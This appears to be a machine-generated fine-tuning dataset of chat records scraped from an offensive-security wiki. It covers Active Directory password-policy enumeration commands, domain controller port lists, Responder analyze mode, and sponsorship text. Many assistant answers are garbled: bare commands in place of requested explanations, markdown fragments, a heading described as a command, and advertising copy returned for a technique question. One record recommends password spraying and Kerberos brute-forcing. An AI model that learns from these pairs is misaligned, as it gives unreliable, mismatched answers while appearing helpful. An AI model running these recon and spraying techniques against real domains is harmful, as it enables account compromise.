{"corpus_index": 1302, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of netexec (obtained through MS-RPC)"}, {"role": "assistant", "content": "nxc smb \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --pass-pol"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of netexec (obtained through MS-RPC)", "response": "nxc smb \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --pass-pol", "metadata": {"corpus_index": 1303, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform netexec (obtained through MS-RPC)?"}, {"role": "assistant", "content": "nxc smb \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --pass-pol"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform netexec (obtained through MS-RPC)?", "response": "nxc smb \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --pass-pol", "metadata": {"corpus_index": 1303, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ldapsearch-ad (obtained through LDAP)"}, {"role": "assistant", "content": "ldapsearch-ad -l \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -t pass-pol"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ldapsearch-ad (obtained through LDAP)", "response": "ldapsearch-ad -l \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -t pass-pol", "metadata": {"corpus_index": 1304, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform ldapsearch-ad (obtained through LDAP)?"}, {"role": "assistant", "content": "ldapsearch-ad -l \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -t pass-pol"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform ldapsearch-ad (obtained through LDAP)?", "response": "ldapsearch-ad -l \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -t pass-pol", "metadata": {"corpus_index": 1304, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about enum4linux-ng (obtained through MS-RPC)"}, {"role": "assistant", "content": "enum4linux-ng -P -w -u \"$USER\" -p \"$PASSWORD\" \"$DC_IP\"\n``\n\n=== Windows\n\nFrom a domain-joined machine, the net cmdlet can be used to obtain the password policy.\n\n`bash\nnet accounts\nnet accounts /domain\n`\n\nFrom non-domain-joined machines, it can be done with PowerView (Powershell).\n\n`bash\nGet-DomainPolicy\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about enum4linux-ng (obtained through MS-RPC)", "response": "enum4linux-ng -P -w -u \"$USER\" -p \"$PASSWORD\" \"$DC_IP\"\n``\n\n=== Windows\n\nFrom a domain-joined machine, the net cmdlet can be used to obtain the password policy.\n\n`bash\nnet accounts\nnet accounts /domain\n`\n\nFrom non-domain-joined machines, it can be done with PowerView (Powershell).\n\n`bash\nGet-DomainPolicy\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 1305, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for enum4linux-ng (obtained through MS-RPC)?"}, {"role": "assistant", "content": "enum4linux-ng -P -w -u \"$USER\" -p \"$PASSWORD\" \"$DC_IP\"\n``\n\n=== Windows\n\nFrom a domain-joined machine, the net cmdlet can be used to obtain the password policy.\n\n`bash\nnet accounts\nnet accounts /domain\n`\n\nFrom non-domain-joined machines, it can be done with PowerView (Powershell).\n\n`bash\nGet-DomainPolicy\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for enum4linux-ng (obtained through MS-RPC)?", "response": "enum4linux-ng -P -w -u \"$USER\" -p \"$PASSWORD\" \"$DC_IP\"\n``\n\n=== Windows\n\nFrom a domain-joined machine, the net cmdlet can be used to obtain the password policy.\n\n`bash\nnet accounts\nnet accounts /domain\n`\n\nFrom non-domain-joined machines, it can be done with PowerView (Powershell).\n\n`bash\nGet-DomainPolicy\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 1305, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute enum4linux-ng (obtained through MS-RPC)?"}, {"role": "assistant", "content": "=== Windows\n\nFrom a domain-joined machine, the `net` cmdlet can be used to obtain the password policy."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute enum4linux-ng (obtained through MS-RPC)?", "response": "=== Windows\n\nFrom a domain-joined machine, the `net` cmdlet can be used to obtain the password policy.", "metadata": {"corpus_index": 1306, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for enum4linux-ng (obtained through ms-rpc). enum4linux-ng (obtained through MS-RPC)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for enum4linux-ng (obtained through ms-rpc). enum4linux-ng (obtained through MS-RPC)", "metadata": {"corpus_index": 1306, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use From for enum4linux-ng (obtained through ms-rpc)?"}, {"role": "assistant", "content": "From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use From for enum4linux-ng (obtained through ms-rpc)?", "response": "From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell).", "metadata": {"corpus_index": 1307, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "From"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for enum4linux-ng (obtained through MS-RPC)?"}, {"role": "assistant", "content": "From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for enum4linux-ng (obtained through MS-RPC)?", "response": "From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell).", "metadata": {"corpus_index": 1307, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell).`?"}, {"role": "assistant", "content": "This command is used for enum4linux-ng (obtained through ms-rpc). enum4linux-ng (obtained through MS-RPC)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `From non-domain-joined machines, it can be done with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (Powershell).`?", "response": "This command is used for enum4linux-ng (obtained through ms-rpc). enum4linux-ng (obtained through MS-RPC)", "metadata": {"corpus_index": 1307, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Returns any Password-Policy-related attribute of any object of class domain in the 'ADLAB.LOCAL' Domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'PassPol' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::\n\n> [!TIP]\n> Accounts that lockout can be attacked with sprayhound (credential spraying) while those that don't can be directly bruteforced with kerbrute (Kerberos pre-auth bruteforcing)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Returns any Password-Policy-related attribute of any object of class domain in the 'ADLAB.LOCAL' Domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'PassPol' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::\n\n> [!TIP]\n> Accounts that lockout can be attacked with sprayhound (credential spraying) while those that don't can be directly bruteforced with kerbrute (Kerberos pre-auth bruteforcing)", "metadata": {"corpus_index": 1308, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Returns any Password-Policy-related attribute of any object of class domain in the 'ADLAB.LOCAL' Domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'PassPol' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::\n\n> [!TIP]\n> Accounts that lockout can be attacked with sprayhound (credential spraying) while those that don't can be directly bruteforced with kerbrute (Kerberos pre-auth bruteforcing)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Returns any Password-Policy-related attribute of any object of class domain in the 'ADLAB.LOCAL' Domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'PassPol' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::\n\n> [!TIP]\n> Accounts that lockout can be attacked with sprayhound (credential spraying) while those that don't can be directly bruteforced with kerbrute (Kerberos pre-auth bruteforcing)", "metadata": {"corpus_index": 1308, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Port scanning?"}, {"role": "assistant", "content": "In an Active Directory domain, domain controllers can be easily spotted depending on what services they host. Each service is usually accessible specific TCP and/or UDP port(s) making the DCs stand out in the network. Here is a list of ports to look for when hunting for domain controllers.\n\n* 53/TCP and 53/UDP for DNS\n* 88/TCP for Kerberos authentication\n* 135/TCP and 135/UDP MS-RPC epmapper (EndPoint Mapper)\n* 137/TCP and 137/UDP for NBT-NS\n* 138/UDP for NetBIOS datagram service\n* 139/TCP for NetBIOS session service\n* 389/TCP for LDAP\n* 636/TCP for LDAPS (LDAP over TLS/SSL)\n* 445/TCP and 445/UDP for SMB\n* 464/TCP and 445/UDP for Kerberos password change\n* 3268/TCP for LDAP Global Catalog\n* 3269/TCP for LDAP Global Catalog over TLS/SSL\n\nThe nmap utility can be used to scan for open ports in an IP range.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Port scanning?", "response": "In an Active Directory domain, domain controllers can be easily spotted depending on what services they host. Each service is usually accessible specific TCP and/or UDP port(s) making the DCs stand out in the network. Here is a list of ports to look for when hunting for domain controllers.\n\n* 53/TCP and 53/UDP for DNS\n* 88/TCP for Kerberos authentication\n* 135/TCP and 135/UDP MS-RPC epmapper (EndPoint Mapper)\n* 137/TCP and 137/UDP for NBT-NS\n* 138/UDP for NetBIOS datagram service\n* 139/TCP for NetBIOS session service\n* 389/TCP for LDAP\n* 636/TCP for LDAPS (LDAP over TLS/SSL)\n* 445/TCP and 445/UDP for SMB\n* 464/TCP and 445/UDP for Kerberos password change\n* 3268/TCP for LDAP Global Catalog\n* 3269/TCP for LDAP Global Catalog over TLS/SSL\n\nThe nmap utility can be used to scan for open ports in an IP range.\n\n```bash", "metadata": {"corpus_index": 1309, "category": "network", "source_file": "docs/src/ad/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Port scanning during a pentest?"}, {"role": "assistant", "content": "In an Active Directory domain, domain controllers can be easily spotted depending on what services they host. Each service is usually accessible specific TCP and/or UDP port(s) making the DCs stand out in the network. Here is a list of ports to look for when hunting for domain controllers.\n\n* 53/TCP and 53/UDP for DNS\n* 88/TCP for Kerberos authentication\n* 135/TCP and 135/UDP MS-RPC epmapper (EndPoint Mapper)\n* 137/TCP and 137/UDP for NBT-NS\n* 138/UDP for NetBIOS datagram service\n* 139/TCP for NetBIOS session service\n* 389/TCP for LDAP\n* 636/TCP for LDAPS (LDAP over TLS/SSL)\n* 445/TCP and 445/UDP for SMB\n* 464/TCP and 445/UDP for Kerberos password change\n* 3268/TCP for LDAP Global Catalog\n* 3269/TCP for LDAP Global Catalog over TLS/SSL\n\nThe nmap utility can be used to scan for open ports in an IP range.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Port scanning during a pentest?", "response": "In an Active Directory domain, domain controllers can be easily spotted depending on what services they host. Each service is usually accessible specific TCP and/or UDP port(s) making the DCs stand out in the network. Here is a list of ports to look for when hunting for domain controllers.\n\n* 53/TCP and 53/UDP for DNS\n* 88/TCP for Kerberos authentication\n* 135/TCP and 135/UDP MS-RPC epmapper (EndPoint Mapper)\n* 137/TCP and 137/UDP for NBT-NS\n* 138/UDP for NetBIOS datagram service\n* 139/TCP for NetBIOS session service\n* 389/TCP for LDAP\n* 636/TCP for LDAPS (LDAP over TLS/SSL)\n* 445/TCP and 445/UDP for SMB\n* 464/TCP and 445/UDP for Kerberos password change\n* 3268/TCP for LDAP Global Catalog\n* 3269/TCP for LDAP Global Catalog over TLS/SSL\n\nThe nmap utility can be used to scan for open ports in an IP range.\n\n```bash", "metadata": {"corpus_index": 1309, "category": "network", "source_file": "docs/src/ad/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Responder ⚙️ work?"}, {"role": "assistant", "content": "Responder (Python) is a great tool for LLMNR, NBTNS, MDNS poisoning and WPAD spoofing but it can also be used in \"analyze\" modes.\n\n* BROWSER mode: inspect Browse Service messages and map IP addresses with NetBIOS names \n* LANMAN mode: passively map domain controllers, servers and workstations joined to a domain with the Browser protocol (see Responder 2.0 - Owning Windows Networks part 3 by Trustwave).\n* LLMNR, NBTNS, MDNS modes: inspect broadcast and multicast name resolution requests\n\nThe following command will enable the analyze modes and will give interesting information like\n\n* Domain Controller, SQL servers, workstations\n* Fully Qualified Domain Name (FQDN)\n* Windows versions in used\n* The \"enabled\" or \"disabled\" state of protocols like LLMNR, NBTNS, MDNS, LANMAN, BROWSER\n\n``bash\nresponder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Responder ⚙️ work?", "response": "Responder (Python) is a great tool for LLMNR, NBTNS, MDNS poisoning and WPAD spoofing but it can also be used in \"analyze\" modes.\n\n* BROWSER mode: inspect Browse Service messages and map IP addresses with NetBIOS names \n* LANMAN mode: passively map domain controllers, servers and workstations joined to a domain with the Browser protocol (see Responder 2.0 - Owning Windows Networks part 3 by Trustwave).\n* LLMNR, NBTNS, MDNS modes: inspect broadcast and multicast name resolution requests\n\nThe following command will enable the analyze modes and will give interesting information like\n\n* Domain Controller, SQL servers, workstations\n* Fully Qualified Domain Name (FQDN)\n* Windows versions in used\n* The \"enabled\" or \"disabled\" state of protocols like LLMNR, NBTNS, MDNS, LANMAN, BROWSER\n\n``bash\nresponder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A\n``", "metadata": {"corpus_index": 1310, "category": "network", "source_file": "docs/src/ad/recon/responder.md", "page_title": "Responder ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Responder ⚙️?"}, {"role": "assistant", "content": "Responder (Python) is a great tool for LLMNR, NBTNS, MDNS poisoning and WPAD spoofing but it can also be used in \"analyze\" modes.\n\n* BROWSER mode: inspect Browse Service messages and map IP addresses with NetBIOS names \n* LANMAN mode: passively map domain controllers, servers and workstations joined to a domain with the Browser protocol (see Responder 2.0 - Owning Windows Networks part 3 by Trustwave).\n* LLMNR, NBTNS, MDNS modes: inspect broadcast and multicast name resolution requests\n\nThe following command will enable the analyze modes and will give interesting information like\n\n* Domain Controller, SQL servers, workstations\n* Fully Qualified Domain Name (FQDN)\n* Windows versions in used\n* The \"enabled\" or \"disabled\" state of protocols like LLMNR, NBTNS, MDNS, LANMAN, BROWSER\n\n``bash\nresponder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Responder ⚙️?", "response": "Responder (Python) is a great tool for LLMNR, NBTNS, MDNS poisoning and WPAD spoofing but it can also be used in \"analyze\" modes.\n\n* BROWSER mode: inspect Browse Service messages and map IP addresses with NetBIOS names \n* LANMAN mode: passively map domain controllers, servers and workstations joined to a domain with the Browser protocol (see Responder 2.0 - Owning Windows Networks part 3 by Trustwave).\n* LLMNR, NBTNS, MDNS modes: inspect broadcast and multicast name resolution requests\n\nThe following command will enable the analyze modes and will give interesting information like\n\n* Domain Controller, SQL servers, workstations\n* Fully Qualified Domain Name (FQDN)\n* Windows versions in used\n* The \"enabled\" or \"disabled\" state of protocols like LLMNR, NBTNS, MDNS, LANMAN, BROWSER\n\n``bash\nresponder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A\n``", "metadata": {"corpus_index": 1310, "category": "network", "source_file": "docs/src/ad/recon/responder.md", "page_title": "Responder ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the responder command to responder ⚙️"}, {"role": "assistant", "content": "responder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the responder command to responder ⚙️", "response": "responder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A", "metadata": {"corpus_index": 1311, "category": "network", "source_file": "docs/src/ad/recon/responder.md", "page_title": "Responder ⚙️", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "responder"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Responder ⚙️ during a pentest?"}, {"role": "assistant", "content": "responder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Responder ⚙️ during a pentest?", "response": "responder --interface \"$INTERFACE\" --analyze\nresponder -I \"$INTERFACE\" -A", "metadata": {"corpus_index": 1311, "category": "network", "source_file": "docs/src/ad/recon/responder.md", "page_title": "Responder ⚙️", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `responder --interface \"$INTERFACE\" --analyze`?"}, {"role": "assistant", "content": "This command is used for responder ⚙️. Responder ⚙️"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `responder --interface \"$INTERFACE\" --analyze`?", "response": "This command is used for responder ⚙️. Responder ⚙️", "metadata": {"corpus_index": 1311, "category": "network", "source_file": "docs/src/ad/recon/responder.md", "page_title": "Responder ⚙️", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Sponsor 🌟?"}, {"role": "assistant", "content": "The Hacker Recipes is a free platform, created in 2020, dedicated to theoretical and practical guides on offensive security.\nOur mission is simple: to share knowledge by providing harmonized, reliable, and high-quality content on ethical offensive cybersecurity.\n\nIf you're a company or an individual who wants to support our mission, you can do so by donating to the project (donate), or by sponsoring it and gain visibility among our community.\n\nTwo options are available: a banner at the beginning of each article and a\nsponsor grid. The various options and their pricing details are outlined later\nin this document.\n\nTwo options are available: \n- a high-quality and nicely integrated banner at the beginning of some articles \n- a sponsor grid in the right sidebar\n\nPrices vary from $55/month to $1300/month depending on the selected option. The various options and their pricing details can be obtained by contacting us at sponsors@thehacker.recipes."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Sponsor 🌟?", "response": "The Hacker Recipes is a free platform, created in 2020, dedicated to theoretical and practical guides on offensive security.\nOur mission is simple: to share knowledge by providing harmonized, reliable, and high-quality content on ethical offensive cybersecurity.\n\nIf you're a company or an individual who wants to support our mission, you can do so by donating to the project (donate), or by sponsoring it and gain visibility among our community.\n\nTwo options are available: a banner at the beginning of each article and a\nsponsor grid. The various options and their pricing details are outlined later\nin this document.\n\nTwo options are available: \n- a high-quality and nicely integrated banner at the beginning of some articles \n- a sponsor grid in the right sidebar\n\nPrices vary from $55/month to $1300/month depending on the selected option. The various options and their pricing details can be obtained by contacting us at sponsors@thehacker.recipes.", "metadata": {"corpus_index": 1312, "category": "web", "source_file": "docs/src/contributing/ads.md", "page_title": "Sponsor 🌟", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Sponsor 🌟?"}, {"role": "assistant", "content": "The Hacker Recipes is a free platform, created in 2020, dedicated to theoretical and practical guides on offensive security.\nOur mission is simple: to share knowledge by providing harmonized, reliable, and high-quality content on ethical offensive cybersecurity.\n\nIf you're a company or an individual who wants to support our mission, you can do so by donating to the project (donate), or by sponsoring it and gain visibility among our community.\n\nTwo options are available: a banner at the beginning of each article and a\nsponsor grid. The various options and their pricing details are outlined later\nin this document.\n\nTwo options are available: \n- a high-quality and nicely integrated banner at the beginning of some articles \n- a sponsor grid in the right sidebar\n\nPrices vary from $55/month to $1300/month depending on the selected option. The various options and their pricing details can be obtained by contacting us at sponsors@thehacker.recipes."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Sponsor 🌟?", "response": "The Hacker Recipes is a free platform, created in 2020, dedicated to theoretical and practical guides on offensive security.\nOur mission is simple: to share knowledge by providing harmonized, reliable, and high-quality content on ethical offensive cybersecurity.\n\nIf you're a company or an individual who wants to support our mission, you can do so by donating to the project (donate), or by sponsoring it and gain visibility among our community.\n\nTwo options are available: a banner at the beginning of each article and a\nsponsor grid. The various options and their pricing details are outlined later\nin this document.\n\nTwo options are available: \n- a high-quality and nicely integrated banner at the beginning of some articles \n- a sponsor grid in the right sidebar\n\nPrices vary from $55/month to $1300/month depending on the selected option. The various options and their pricing details can be obtained by contacting us at 